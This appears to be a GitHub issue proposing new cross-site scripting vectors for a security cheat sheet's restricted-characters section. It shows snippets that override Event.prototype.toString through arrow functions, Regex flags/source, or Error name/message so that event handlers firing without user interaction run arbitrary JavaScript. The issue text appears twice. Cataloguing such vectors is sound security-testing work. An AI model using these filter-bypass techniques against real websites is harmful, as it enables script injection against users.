You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I'd like to propose the addition of a few new vectors to the Restricted Characters section of the XSS cheat sheet, specifically ones utilizing various Javascript event handlers and require no user interaction.
The tables below showcase several Javascript event handlers that can be fired using a restricted set of characters and require no user interaction, additionally it demonstrates how these event handlers can be used to achieve arbitrary Javascript execution by overriding the Event object's inherited toString function using 2 different methods.
The first method uses Arrow functions (requires a > character) e.g: Event.prototype.toString=x=>'x' results in x
The second method inspired by @terjanq overwrites the Event object's toString function with the toString function of another Object that has writeable and reflected properties (name/message properties for any of the Error Objects & flags/source properties for the Regex Object as shown in @terjanq's post.
Regex object example: Event.prototype.toString=/x/.toString;Event.prototype.flags='x';Event.prototype.source='x' results in /x/x
Error object example: Event.prototype.toString=Error.prototype.toString;Event.prototype.message='x';Event.prototype.name='x' results in x: x
Additionally I noticed that this vector which utilizes the onerror event handler and doesn't require a throw statement is missing from the cheat sheet, I think it might be worth adding as well.
EDIT:
In hindsight for the non-onerror events I think it'd probably make more sense to only include the Error, DOMException & Regex objects & Arrow function in the cheat sheet as they are the only uniquely worded ones and it seems like some of the other Error objects aren't supported on Safari/Chromium on mobile.
Thank you. ❤️
The text was updated successfully, but these errors were encountered:
Hello👋
I'd like to propose the addition of a few new vectors to the Restricted Characters section of the XSS cheat sheet, specifically ones utilizing various Javascript event handlers and require no user interaction.
The tables below showcase several Javascript event handlers that can be fired using a restricted set of characters and require no user interaction, additionally it demonstrates how these event handlers can be used to achieve arbitrary Javascript execution by overriding the Event object's inherited toString function using 2 different methods.
The first method uses Arrow functions (requires a
>character) e.g:Event.prototype.toString=x=>'x'results inxThe second method inspired by @terjanq overwrites the Event object's toString function with the toString function of another Object that has writeable and reflected properties (
name/messageproperties for any of the Error Objects &flags/sourceproperties for the Regex Object as shown in @terjanq's post.Regex object example:
Event.prototype.toString=/x/.toString;Event.prototype.flags='x';Event.prototype.source='x'results in/x/xError object example:
Event.prototype.toString=Error.prototype.toString;Event.prototype.message='x';Event.prototype.name='x'results inx: xAdditionally I noticed that this vector which utilizes the onerror event handler and doesn't require a
throwstatement is missing from the cheat sheet, I think it might be worth adding as well.EDIT:
In hindsight for the non-onerror events I think it'd probably make more sense to only include the
Error,DOMException&Regexobjects & Arrow function in the cheat sheet as they are the only uniquely worded ones and it seems like some of the other Error objects aren't supported on Safari/Chromium on mobile.Thank you. ❤️
The text was updated successfully, but these errors were encountered: